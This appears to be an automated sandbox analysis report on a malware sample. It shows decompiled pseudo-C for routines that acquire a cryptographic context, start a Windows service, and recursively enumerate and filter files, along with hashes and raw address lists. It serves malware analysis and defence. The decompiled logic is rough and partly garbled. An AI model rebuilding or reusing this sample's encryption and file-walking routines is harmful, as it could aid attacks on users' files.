Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: Service$CloseHandleOpen$DeleteManager
String ID:
API String ID: 204194956-0
Opcode ID: 947d0a6b5392603d7bf22e4a17163cc9a67b990c0d256c0da8c7b45a9d4b76c0
Instruction ID: 536c913e23d690921e4c7e27408abc738214db588c338d29f8c8e45ae0a78ef9
Opcode Fuzzy Hash: 947d0a6b5392603d7bf22e4a17163cc9a67b990c0d256c0da8c7b45a9d4b76c0
Instruction Fuzzy Hash: EDF0FC36191225ABD3320E1CFC09BABFBACEF4A721F09012AFB4057144C774A848D7A4

Uniqueness

Uniqueness Score: -1.00%

Function 01309A90, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E01309A90(void* __eax, void* __ecx) {
				signed int _t7;
				void* _t11;

				_t11 = __ecx + 0x5c;
				if( *((intOrPtr*)(__ecx + 0x5c)) != 0) {
					L5:
					return 1;
				} else {
					__imp__CryptAcquireContextW(_t11, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0xf0000000);
					if(__eax != 0) {
						goto L5;
					} else {
						_t7 = GetLastError();
						if(_t7 != 0x80090016) {
							return 0;
						} else {
							__imp__CryptAcquireContextW(_t11, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
							return _t7 & 0xffffff00 | _t7 != 0x00000000;
						}
					}
				}
			}

0x01309a95
0x01309a98
0x01309add
0x01309ae0
0x01309a9a
0x01309aa9
0x01309ab1
0x00000000
0x01309ab3
0x01309ab3
0x01309abe
0x01309adc
0x01309ac0
0x01309acc
0x01309ad8
0x01309ad8
0x01309abe
0x01309ab1

APIs

CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000), ref: 01309AA9
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01308B84), ref: 01309AB3
CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 01309ACC

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 01309AA1, 01309AC4

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: AcquireContextCrypt$ErrorLast
String ID: Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 2779411412-1948191093
Opcode ID: b22a2d4f419bcb33b924bd7ec0f8c55d4ffc73fe9721c18770f2c528bf54a73a
Instruction ID: a303f657f5ff7c8250be021b10cf663b649f0953c63507c052f1dd5f6239b368
Opcode Fuzzy Hash: b22a2d4f419bcb33b924bd7ec0f8c55d4ffc73fe9721c18770f2c528bf54a73a
Instruction Fuzzy Hash: 2DE0D8312C2310B6FF73AA257C46FCE23889F41B2DF224048F109B84C6C39865C7A795

Uniqueness

Uniqueness Score: -1.00%

Function 012FBE00, Relevance: 6.0, APIs: 4, Instructions: 44
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012FBE00(short* _a4) {
				void* _t9;
				signed int _t12;
				void* _t14;
				short* _t16;

				_t16 = _a4;
				_t12 = 0;
				if(_t16[8] == 0) {
					return 0;
				} else {
					_t14 = OpenSCManagerW(0, 0, 0xf003f);
					if(_t14 != 0) {
						if(_t16[0xa] >= 8) {
							_t16 =  *_t16;
						}
						_t9 = OpenServiceW(_t14, _t16, 0x10);
						if(_t9 != 0) {
							_t12 = _t12 & 0xffffff00 | StartServiceW(_t9, 0, 0) != 0x00000000;
						}
						CloseServiceHandle(_t14);
					}
					return _t12;
				}
			}

0x012fbe05
0x012fbe08
0x012fbe0e
0x012fbe61
0x012fbe10
0x012fbe20
0x012fbe24
0x012fbe2a
0x012fbe2c
0x012fbe2c
0x012fbe32
0x012fbe3a
0x012fbe49
0x012fbe49
0x012fbe4d
0x012fbe4d
0x012fbe59
0x012fbe59

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 012FBE1A
OpenServiceW.ADVAPI32(00000000,?,00000010), ref: 012FBE32
StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 012FBE41
CloseServiceHandle.ADVAPI32(00000000), ref: 012FBE4D

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: Service$Open$CloseHandleManagerStart
String ID:
API String ID: 2553746010-0
Opcode ID: d50fab6d57882c4c5f76b155198057a8beaa6afb3c30653d0f704e4618f944f0
Instruction ID: cfd99f3385c8ad9c813b4ade45662d00d4eee82c1253bb845dcdbee8b0701389
Opcode Fuzzy Hash: d50fab6d57882c4c5f76b155198057a8beaa6afb3c30653d0f704e4618f944f0
Instruction Fuzzy Hash: 27F096362D1315ABE6311E29FC09FA7FBACEB85B21F14412AF74097280C7B1A454D674

Uniqueness

Uniqueness Score: -1.00%

Function 0130D280, Relevance: 4.7, APIs: 3, Instructions: 184
fileCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E0130D280(intOrPtr __ecx, intOrPtr _a4, void* _a8, signed int _a44, char _a48) {
				char _v8;
				signed int _v16;
				signed int _v20;
				struct _WIN32_FIND_DATAW _v612;
				void* _v616;
				intOrPtr _v620;
				signed int _v624;
				intOrPtr _v628;
				short _v644;
				intOrPtr _v648;
				signed int _v652;
				signed int _v656;
				char _v676;
				signed int _v680;
				signed int _v684;
				short _v700;
				intOrPtr* _v712;
				signed int _v724;
				signed int _v728;
				signed int _v748;
				signed int _v752;
				char _v768;
				char _v772;
				signed int _v780;
				short _v784;
				char _v800;
				intOrPtr _v804;
				signed int _v808;
				intOrPtr* _v812;
				signed int _v824;
				intOrPtr _v828;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t167;
				signed int _t168;
				WCHAR* _t177;
				void* _t178;
				signed int _t179;
				signed int _t180;
				signed int _t184;
				signed int _t185;
				long _t186;
				void* _t187;
				void* _t188;
				signed int _t190;
				signed int _t197;
				signed int _t198;
				signed int _t201;
				intOrPtr _t202;
				signed int _t206;
				void* _t207;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				signed int _t212;
				intOrPtr* _t214;
				void* _t215;
				intOrPtr* _t217;
				void* _t218;
				void* _t219;
				intOrPtr* _t220;
				signed int _t224;
				signed int _t226;
				void* _t231;
				signed int _t234;
				signed int _t236;
				void* _t243;
				void* _t244;
				signed int _t246;
				intOrPtr _t252;
				intOrPtr _t255;
				intOrPtr _t256;
				void* _t258;
				intOrPtr* _t260;
				signed int _t267;
				char* _t269;
				intOrPtr* _t270;
				signed int _t274;
				intOrPtr* _t277;
				signed int _t278;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				intOrPtr _t288;
				intOrPtr* _t291;
				intOrPtr* _t292;
				signed int _t296;
				signed int _t302;
				void* _t307;
				intOrPtr _t308;
				intOrPtr _t309;
				signed int _t311;
				signed int _t312;
				void* _t315;
				intOrPtr _t320;
				intOrPtr _t321;
				intOrPtr _t323;
				intOrPtr* _t325;
				intOrPtr* _t328;
				intOrPtr _t331;
				void* _t333;
				void* _t334;
				signed int _t335;
				void* _t336;
				signed int _t337;
				signed int _t338;
				void* _t340;
				intOrPtr* _t342;
				intOrPtr* _t343;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				void* _t349;
				void* _t350;
				signed int _t351;
				signed int _t353;

				_push(0xffffffff);
				_push(0x136741f);
				_push( *[fs:0x0]);
				_t350 = _t349 - 0x2ac;
				_t167 =  *0x13a4018; // 0x39cca9f6
				_t168 = _t167 ^ _t346;
				_v20 = _t168;
				_push(_t168);
				 *[fs:0x0] =  &_v16;
				_t323 = __ecx;
				_v648 = __ecx;
				_t252 = _a4;
				_v620 = _t252;
				_v8 = 0;
				if( *((intOrPtr*)(_t252 + 0x10)) == 0) {
					L42:
					_t260 = _a44;
					if(_t260 != 0) {
						 *((intOrPtr*)( *_t260 + 0x10))(( &_a8 & 0xffffff00 | _t260 !=  &_a8) & 0x000000ff);
					}
					goto L44;
				} else {
					if(_a44 == 0) {
						L44:
						 *[fs:0x0] = _v16;
						_pop(_t333);
						return E0132EA79(_v20 ^ _t346, _t333);
					} else {
						E013478D0(__ecx,  &_v612, 0, 0x250);
						_push(0x1396bbc);
						_t177 = E012FC400(_t252,  &_v700, _t252, _t323);
						_t351 = _t350 + 0x10;
						if(_t177[0xa] >= 8) {
							_t177 =  *_t177;
						}
						_t178 = FindFirstFileW(_t177,  &_v612);
						_t267 = _v680;
						_v616 = _t178;
						if(_t267 >= 8) {
							_push(2 + _t267 * 2);
							E012F56A0(_t252, _t323, _v700);
							_t178 = _v616;
							_t351 = _t351 + 8;
						}
						_v684 = 0;
						_v680 = 7;
						_v700 = 0;
						if(_t178 != 0xffffffff) {
							_t334 = _v616;
							do {
								_t269 = ".";
								_t179 =  &(_v612.cFileName);
								while(1) {
									_t307 =  *_t179;
									if(_t307 !=  *_t269) {
										break;
									}
									if(_t307 == 0) {
										L13:
										_t180 = 0;
									} else {
										_t321 =  *((intOrPtr*)(_t179 + 2));
										if(_t321 != _t269[2]) {
											break;
										} else {
											_t179 = _t179 + 4;
											_t269 =  &(_t269[4]);
											if(_t321 != 0) {
												continue;
											} else {
												goto L13;
											}
										}
									}
									L15:
									if(_t180 == 0) {
										goto L40;
									} else {
										_t184 = 0x1396bc4;
										_t270 =  &(_v612.cFileName);
										while(1) {
											_t308 =  *_t270;
											if(_t308 !=  *_t184) {
												break;
											}
											if(_t308 == 0) {
												L21:
												_t185 = 0;
											} else {
												_t320 =  *((intOrPtr*)(_t270 + 2));
												if(_t320 !=  *((intOrPtr*)(_t184 + 2))) {
													break;
												} else {
													_t270 = _t270 + 4;
													_t184 = _t184 + 4;
													if(_t320 != 0) {
														continue;
													} else {
														goto L21;
													}
												}
											}
											L23:
											if(_t185 == 0) {
												goto L40;
											} else {
												_t186 = _v612.dwFileAttributes;
												if((_t186 & 0x00000004) != 0) {
													goto L40;
												} else {
													if(_a48 != 0) {
														L32:
														_t309 = _t252;
														_push("\\");
														if((_t186 & 0x00000010) == 0) {
															_t187 = E012FC400(_t252,  &_v676, _t309, _t323);
															_v8 = 5;
															_t188 = E012F8470( &_v644, _t187,  &(_v612.cFileName));
															_t351 = _t351 + 8;
															_v8 = 6;
															_t274 = _a44;
															__eflags = _t274;
															if(__eflags == 0) {
																E01316BEC(__eflags);
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																_push(_t346);
																_t347 = _t351;
																_t353 = (_t351 & 0xfffffff0) - 0x58;
																_t190 =  *0x13a4018; // 0x39cca9f6
																_v724 = _t190 ^ _t353;
																_push(_t334);
																_push(_t323);
																_t325 = _v712;
																_t335 = _t274;
																_v808 = _t335;
																_t311 =  *(_t325 + 0x10);
																__eflags = _t311;
																if(_t311 == 0) {
																	L87:
																	_pop(_t336);
																	__eflags = _v724 ^ _t353;
																	return E0132EA79(_v724 ^ _t353, _t336);
																} else {
																	__eflags =  *((intOrPtr*)(_t325 + 0x14)) - 8;
																	_t277 = _t325;
																	if( *((intOrPtr*)(_t325 + 0x14)) >= 8) {
																		_t277 =  *_t325;
																	}
																	_push(_v804);
																	_t278 = E012F86C0(_t252, _t277, _t311, _t325, _t277, ".", 1);
																	_t353 = _t353 + 0x10;
																	__eflags = _t278 - 0xffffffff;
																	if(_t278 == 0xffffffff) {
																		_push(0);
																		_v752 = 0;
																		_v748 = 7;
																		_v768 = 0;
																		E012F51B0(_t252,  &_v768, _t325, _t335, 0x13836c0);
																		goto L60;
																	} else {
																		_v784 = 0;
																		_v800 = 0;
																		_t210 =  *(_t325 + 0x10);
																		_v780 = 7;
																		__eflags = _t210 - _t278;
																		if(_t210 < _t278) {
																			E012F8000(_t252, _t278, _t311, _t325);
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			_push(_t347);
																			_push(_t278);
																			_push(_t252);
																			_push(_t335);
																			_push(_t325);
																			_t328 = _v812;
																			_t212 = _t278;
																			_v824 = _t212;
																			_t313 =  *(_t328 + 0x10);
																			__eflags =  *(_t328 + 0x10);
																			if( *(_t328 + 0x10) == 0) {
																				L106:
																				__eflags = 0;
																				return 0;
																			} else {
																				_t342 =  *((intOrPtr*)(_t212 + 0x30));
																				_t255 =  *((intOrPtr*)(_t212 + 0x34));
																				__eflags = _t342 - _t255;
																				if(_t342 == _t255) {
																					L98:
																					_t343 =  *((intOrPtr*)(_t212 + 0x24));
																					_t256 =  *((intOrPtr*)(_t212 + 0x28));
																					__eflags = _t343 - _t256;
																					if(_t343 == _t256) {
																						goto L106;
																					} else {
																						while(1) {
																							__eflags =  *((intOrPtr*)(_t343 + 0x14)) - 8;
																							_t214 = _t343;
																							if( *((intOrPtr*)(_t343 + 0x14)) >= 8) {
																								_t214 =  *_t343;
																							}
																							__eflags =  *((intOrPtr*)(_t328 + 0x14)) - 8;
																							_t291 = _t328;
																							if( *((intOrPtr*)(_t328 + 0x14)) >= 8) {
																								_t291 =  *_t328;
																							}
																							_t215 = E012F8820(_t291, _t313, 0, _t214,  *((intOrPtr*)(_t343 + 0x10)));
																							_t353 = _t353 + 0xc;
																							__eflags = _t215 - 0xffffffff;
																							if(_t215 != 0xffffffff) {
																								break;
																							}
																							_t313 =  *(_t328 + 0x10);
																							_t343 = _t343 + 0x18;
																							__eflags = _t343 - _t256;
																							if(_t343 != _t256) {
																								continue;
																							} else {
																								goto L106;
																							}
																							goto L108;
																						}
																						return 1;
																					}
																				} else {
																					while(1) {
																						__eflags =  *((intOrPtr*)(_t342 + 0x14)) - 8;
																						_t217 = _t342;
																						if( *((intOrPtr*)(_t342 + 0x14)) >= 8) {
																							_t217 =  *_t342;
																						}
																						__eflags =  *((intOrPtr*)(_t328 + 0x14)) - 8;
																						_t292 = _t328;
																						if( *((intOrPtr*)(_t328 + 0x14)) >= 8) {
																							_t292 =  *_t328;
																						}
																						_t218 = E012F8820(_t292, _t313, 0, _t217,  *((intOrPtr*)(_t342 + 0x10)));
																						_t353 = _t353 + 0xc;
																						__eflags = _t218 - 0xffffffff;
																						if(_t218 != 0xffffffff) {
																							goto L106;
																						}
																						_t313 =  *(_t328 + 0x10);
																						_t342 = _t342 + 0x18;
																						__eflags = _t342 - _t255;
																						if(_t342 != _t255) {
																							continue;
																						} else {
																							_t212 = _v16;
																							goto L98;
																						}
																						goto L108;
																					}
																					goto L106;
																				}
																			}
																		} else {
																			_t219 = _t210 - _t278;
																			__eflags = _t219 - 0xffffffff;
																			_t315 =  <  ? _t219 : _t311 | 0xffffffff;
																			__eflags =  *((intOrPtr*)(_t325 + 0x14)) - 8;
																			_t220 = _t325;
																			if( *((intOrPtr*)(_t325 + 0x14)) >= 8) {
																				_t220 =  *_t325;
																			}
																			_push(_t315);
																			E012F51B0(_t252,  &_v800, _t325, _t335, _t220 + _t278 * 2);
																			asm("movaps xmm0, [esp+0x10]");
																			asm("movaps [esp+0x30], xmm0");
																			asm("movq xmm0, [esp+0x20]");
																			asm("movq [esp+0x40], xmm0");
																			L60:
																			_t312 = _t335 + 0x54;
																			_t197 = E012F90C0(_t252,  &_v772, _t312, _t325);
																			__eflags = _t197;
																			if(_t197 != 0) {
																				L85:
																				_t198 = _v752;
																				__eflags = _t198 - 8;
																				if(_t198 >= 8) {
																					_push(2 + _t198 * 2);
																					E012F56A0(_t252, _t325, _v772);
																					_t353 = _t353 + 8;
																				}
																				goto L87;
																			} else {
																				_t201 = E0130D950(_t335, _t325);
																				__eflags = _t201;
																				if(_t201 != 0) {
																					goto L85;
																				} else {
																					_t202 = _v812;
																					_t337 =  *(_t335 + 0x3c);
																					_t126 = _t202 + 0x40; // 0x44434241
																					_t282 =  *_t126;
																					_v808 = _t282;
																					__eflags = _t337 - _t282;
																					if(_t337 == _t282) {
																						L66:
																						_t131 = _t202 + 0x4c; // 0x504f4e4d
																						_t283 =  *_t131;
																						_t132 = _t202 + 0x48; // 0x4c4b4a49
																						_t338 =  *_t132;
																						_v808 = _t283;
																						__eflags = _t338 - _t283;
																						if(_t338 == _t283) {
																							L71:
																							__eflags =  *(_t202 + 0x88);
																							if( *(_t202 + 0x88) <= 0) {
																								L81:
																							} else {
																								_t206 = E0130D9A0(_t252, _t325, _t325);
																								__eflags = _t312;
																								if(__eflags < 0) {
																									goto L81;
																								} else {
																									if(__eflags > 0) {
																										L75:
																										_t207 = E01364FA0(_t206, _t312, 0x100000, 0);
																										_t288 = _v828;
																										__eflags = _t312;
																										if(__eflags < 0) {
																											goto L81;
																										} else {
																											if(__eflags > 0) {
																												L78:
																											} else {
																												_t139 = _t288 + 0x88; // 0x4a414146
																												__eflags = _t207 -  *_t139;
																												if(_t207 <  *_t139) {
																													goto L81;
																												} else {
																													goto L78;
																												}
																											}
																										}
																									} else {
																										__eflags = _t206;
																										if(_t206 == 0) {
																											goto L81;
																										} else {
																											goto L75;
																										}
																									}
																								}
																							}
																						} else {
																							while(1) {
																								_t312 = _t338;
																								_t208 = E012F90C0(_t252,  &_v772, _t312, _t325);
																								__eflags = _t208;
																								if(_t208 != 0) {
																									break;
																								}
																								_t338 = _t338 + 0x18;
																								__eflags = _t338 - _v808;
																								if(_t338 != _v808) {
																									continue;
																								} else {
																									_t202 = _v812;
																									goto L71;
																								}
																								goto L82;
																							}
																						}
																					} else {
																						while(1) {
																							_t312 = _t337;
																							_t209 = E012F90C0(_t252,  &_v772, _t312, _t325);
																							__eflags = _t209;
																							if(_t209 != 0) {
																								break;
																							}
																							_t337 = _t337 + 0x18;
																							__eflags = _t337 - _v808;
																							if(_t337 != _v808) {
																								continue;
																							} else {
																								_t202 = _v812;
																								goto L66;
																							}
																							goto L82;
																						}
																					}
																					L82:
																					_t284 = _v752;
																					__eflags = _t284 - 8;
																					if(_t284 >= 8) {
																						_push(2 + _t284 * 2);
																						E012F56A0(_t252, _t325, _v772);
																						_t353 = _t353 + 8;
																					}
																					_pop(_t340);
																					__eflags = _v728 ^ _t353;
																					return E0132EA79(_v728 ^ _t353, _t340);
																				}
																			}
																		}
																	}
																}
															} else {
																 *((intOrPtr*)( *_t274 + 8))(_t188);
																_t224 = _v624;
																__eflags = _t224 - 8;
																if(_t224 >= 8) {
																	_push(2 + _t224 * 2);
																	E012F56A0(_t252, _t323, _v644);
																	_t351 = _t351 + 8;
																}
																_v628 = 0;
																_v644 = 0;
																_v8 = 0;
																_t226 = _v656;
																_v624 = 7;
																__eflags = _t226 - 8;
																if(_t226 >= 8) {
																	_push(2 + _t226 * 2);
																	E012F56A0(_t252, _t323, _v676);
																	_t351 = _t351 + 8;
																}
																goto L40;
															}
														} else {
															_t231 = E012FC400(_t252,  &_v676, _t309, _t323);
															_v8 = 2;
															_t331 = E012F8470( &_v644, _t231,  &(_v612.cFileName));
															_push(_a48);
															_t351 = _t351 + 8 - 0x28;
															_t345 = _t351;
															_v652 = _t345;
															 *((intOrPtr*)(_t345 + 0x24)) = 0;
															_v8 = 4;
															_t296 = _a44;
															if(_t296 != 0) {
																 *((intOrPtr*)(_t345 + 0x24)) =  *((intOrPtr*)( *_t296))(_t345);
															}
															_t323 = _v648;
															_v8 = 3;
															E0130D280(_t323, _t331);
															_t234 = _v624;
															if(_t234 >= 8) {
																_push(2 + _t234 * 2);
																E012F56A0(_t252, _t323, _v644);
																_t351 = _t351 + 8;
															}
															_v628 = 0;
															_v644 = 0;
															_v8 = 0;
															_t236 = _v656;
															_v624 = 7;
															if(_t236 >= 8) {
																_push(2 + _t236 * 2);
																E012F56A0(_t252, _t323, _v676);
																_t351 = _t351 + 8;
															}
															_t334 = _v616;
															goto L40;
														}
													} else {
														_push("\\");
														_t243 = E012FC400(_t252,  &_v676, _t252, _t323);
														_v8 = 1;
														_t244 = E012F8470( &_v644, _t243,  &(_v612.cFileName));
														_t351 = _t351 + 8;
														_push(_t244);
														L89();
														_t302 = _v624;
														_t258 = _t244;
														if(_t302 >= 8) {
															_push(2 + _t302 * 2);
															E012F56A0(_t258, _t323, _v644);
															_t351 = _t351 + 8;
														}
														_v628 = 0;
														_v644 = 0;
														_v8 = 0;
														_t246 = _v656;
														_v624 = 7;
														if(_t246 >= 8) {
															_push(2 + _t246 * 2);
															E012F56A0(_t258, _t323, _v676);
															_t351 = _t351 + 8;
														}
														_t252 = _v620;
														if(_t258 != 0) {
															goto L40;
														} else {
															_t186 = _v612.dwFileAttributes;
															goto L32;
														}
													}
												}
											}
											goto L108;
										}
										asm("sbb eax, eax");
										_t185 = _t184 | 0x00000001;
										__eflags = _t185;
										goto L23;
									}
									goto L108;
								}
								asm("sbb eax, eax");
								_t180 = _t179 | 0x00000001;
								__eflags = _t180;
								goto L15;
								L40:
							} while (FindNextFileW(_t334,  &_v612) != 0);
							FindClose(_t334);
						}
						goto L42;
					}
				}
				L108:
			}

0x0130d283
0x0130d285
0x0130d290
0x0130d291
0x0130d297
0x0130d29c
0x0130d29e
0x0130d2a4
0x0130d2a8
0x0130d2ae
0x0130d2b0
0x0130d2b6
0x0130d2b9
0x0130d2bf
0x0130d2ca
0x0130d5ae
0x0130d5ae
0x0130d5b3
0x0130d5c3
0x0130d5c3
0x00000000
0x0130d2d0
0x0130d2d4
0x0130d5c6
0x0130d5c9
0x0130d5d2
0x0130d5e1
0x0130d2da
0x0130d2e8
0x0130d2ed
0x0130d2fa
0x0130d2ff
0x0130d306
0x0130d308
0x0130d308
0x0130d312
0x0130d318
0x0130d31e
0x0130d327
0x0130d330
0x0130d337
0x0130d33c
0x0130d342
0x0130d342
0x0130d347
0x0130d351
0x0130d35b
0x0130d365
0x0130d36b
0x0130d371
0x0130d371
0x0130d376
0x0130d380
0x0130d380
0x0130d386
0x00000000
0x00000000
0x0130d38b
0x0130d3a2
0x0130d3a2
0x0130d38d
0x0130d38d
0x0130d395
0x00000000
0x0130d397
0x0130d397
0x0130d39a
0x0130d3a0
0x00000000
0x00000000
0x00000000
0x00000000
0x0130d3a0
0x0130d395
0x0130d3ab
0x0130d3ad
0x00000000
0x0130d3b3
0x0130d3b3
0x0130d3b8
0x0130d3c0
0x0130d3c0
0x0130d3c6
0x00000000
0x00000000
0x0130d3cb
0x0130d3e2
0x0130d3e2
0x0130d3cd
0x0130d3cd
0x0130d3d5
0x00000000
0x0130d3d7
0x0130d3d7
0x0130d3da
0x0130d3e0
0x00000000
0x00000000
0x00000000
0x00000000
0x0130d3e0
0x0130d3d5
0x0130d3eb
0x0130d3ed
0x00000000
0x0130d3f3
0x0130d3f3
0x0130d3fb
0x00000000
0x0130d401
0x0130d405
0x0130d4b8
0x0130d4be
0x0130d4c0
0x0130d4c7
0x0130d5e4
0x0130d5ef
0x0130d5fc
0x0130d601
0x0130d604
0x0130d608
0x0130d60b
0x0130d60d
0x0130d680
0x0130d685
0x0130d686
0x0130d687
0x0130d688
0x0130d689
0x0130d68a
0x0130d68b
0x0130d68c
0x0130d68d
0x0130d68e
0x0130d68f
0x0130d690
0x0130d691
0x0130d696
0x0130d699
0x0130d6a0
0x0130d6a4
0x0130d6a5
0x0130d6a6
0x0130d6a9
0x0130d6ab
0x0130d6af
0x0130d6b2
0x0130d6b4
0x0130d87b
0x0130d882
0x0130d883
0x0130d88d
0x0130d6ba
0x0130d6ba
0x0130d6be
0x0130d6c0
0x0130d6c2
0x0130d6c2
0x0130d6c4
0x0130d6d5
0x0130d6d7
0x0130d6dc
0x0130d6df
0x0130d738
0x0130d743
0x0130d74b
0x0130d753
0x0130d758
0x00000000
0x0130d6e1
0x0130d6e1
0x0130d6e5
0x0130d6ea
0x0130d6ed
0x0130d6f5
0x0130d6f7
0x0130d890
0x0130d895
0x0130d896
0x0130d897
0x0130d898
0x0130d899
0x0130d89a
0x0130d89b
0x0130d89c
0x0130d89d
0x0130d89e
0x0130d89f
0x0130d8a0
0x0130d8a3
0x0130d8a4
0x0130d8a5
0x0130d8a6
0x0130d8a7
0x0130d8aa
0x0130d8ac
0x0130d8af
0x0130d8b2
0x0130d8b4
0x0130d931
0x0130d933
0x0130d939
0x0130d8b6
0x0130d8b6
0x0130d8b9
0x0130d8bc
0x0130d8be
0x0130d8f4
0x0130d8f4
0x0130d8f7
0x0130d8fa
0x0130d8fc
0x00000000
0x0130d900
0x0130d900
0x0130d900
0x0130d904
0x0130d906
0x0130d908
0x0130d908
0x0130d90a
0x0130d90e
0x0130d910
0x0130d912
0x0130d912
0x0130d91a
0x0130d91f
0x0130d922
0x0130d925
0x00000000
0x00000000
0x0130d927
0x0130d92a
0x0130d92d
0x0130d92f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0130d92f
0x0130d944
0x0130d944
0x0130d8c0
0x0130d8c0
0x0130d8c0
0x0130d8c4
0x0130d8c6
0x0130d8c8
0x0130d8c8
0x0130d8ca
0x0130d8ce
0x0130d8d0
0x0130d8d2
0x0130d8d2
0x0130d8da
0x0130d8df
0x0130d8e2
0x0130d8e5
0x00000000
0x00000000
0x0130d8e7
0x0130d8ea
0x0130d8ed
0x0130d8ef
0x00000000
0x0130d8f1
0x0130d8f1
0x00000000
0x0130d8f1
0x00000000
0x0130d8ef
0x00000000
0x0130d8c0
0x0130d8be
0x0130d6fd
0x0130d6fd
0x0130d702
0x0130d705
0x0130d708
0x0130d70c
0x0130d70e
0x0130d710
0x0130d710
0x0130d715
0x0130d71b
0x0130d720
0x0130d725
0x0130d72a
0x0130d730
0x0130d75d
0x0130d75d
0x0130d764
0x0130d769
0x0130d76b
0x0130d85e
0x0130d85e
0x0130d862
0x0130d865
0x0130d86e
0x0130d873
0x0130d878
0x0130d878
0x00000000
0x0130d771
0x0130d774
0x0130d779
0x0130d77b
0x00000000
0x0130d781
0x0130d781
0x0130d785
0x0130d788
0x0130d788
0x0130d78b
0x0130d78f
0x0130d791
0x0130d7af
0x0130d7af
0x0130d7af
0x0130d7b2
0x0130d7b2
0x0130d7b5
0x0130d7b9
0x0130d7bb
0x0130d7dc
0x0130d7dc
0x0130d7e3
0x0130d827
0x0130d7e5
0x0130d7e6
0x0130d7eb
0x0130d7ed
0x00000000
0x0130d7ef
0x0130d7ef
0x0130d7f5
0x0130d7fe
0x0130d803
0x0130d807
0x0130d809
0x00000000
0x0130d80b
0x0130d80b
0x0130d815
0x0130d80d
0x0130d80d
0x0130d80d
0x0130d813
0x00000000
0x00000000
0x00000000
0x00000000
0x0130d813
0x0130d80b
0x0130d7f1
0x0130d7f1
0x0130d7f3
0x00000000
0x00000000
0x00000000
0x00000000
0x0130d7f3
0x0130d7ef
0x0130d7ed
0x0130d7c0
0x0130d7c0
0x0130d7c0
0x0130d7c6
0x0130d7cb
0x0130d7cd
0x00000000
0x00000000
0x0130d7cf
0x0130d7d2
0x0130d7d6
0x00000000
0x0130d7d8
0x0130d7d8
0x00000000
0x0130d7d8
0x00000000
0x0130d7d6
0x0130d820
0x0130d793
0x0130d793
0x0130d793
0x0130d799
0x0130d79e
0x0130d7a0
0x00000000
0x00000000
0x0130d7a2
0x0130d7a5
0x0130d7a9
0x00000000
0x0130d7ab
0x0130d7ab
0x00000000
0x0130d7ab
0x00000000
0x0130d7a9
0x0130d81c
0x0130d82c
0x0130d82c
0x0130d830
0x0130d833
0x0130d83c
0x0130d841
0x0130d846
0x0130d846
0x0130d84c
0x0130d851
0x0130d85b
0x0130d85b
0x0130d77b
0x0130d76b
0x0130d6f7
0x0130d6df
0x0130d60f
0x0130d612
0x0130d615
0x0130d61b
0x0130d61e
0x0130d627
0x0130d62e
0x0130d633
0x0130d633
0x0130d638
0x0130d642
0x0130d649
0x0130d64c
0x0130d652
0x0130d65c
0x0130d65f
0x0130d66c
0x0130d673
0x0130d678
0x0130d678
0x00000000
0x0130d65f
0x0130d4cd
0x0130d4cd
0x0130d4d8
0x0130d4ed
0x0130d4ef
0x0130d4f2
0x0130d4f5
0x0130d4f7
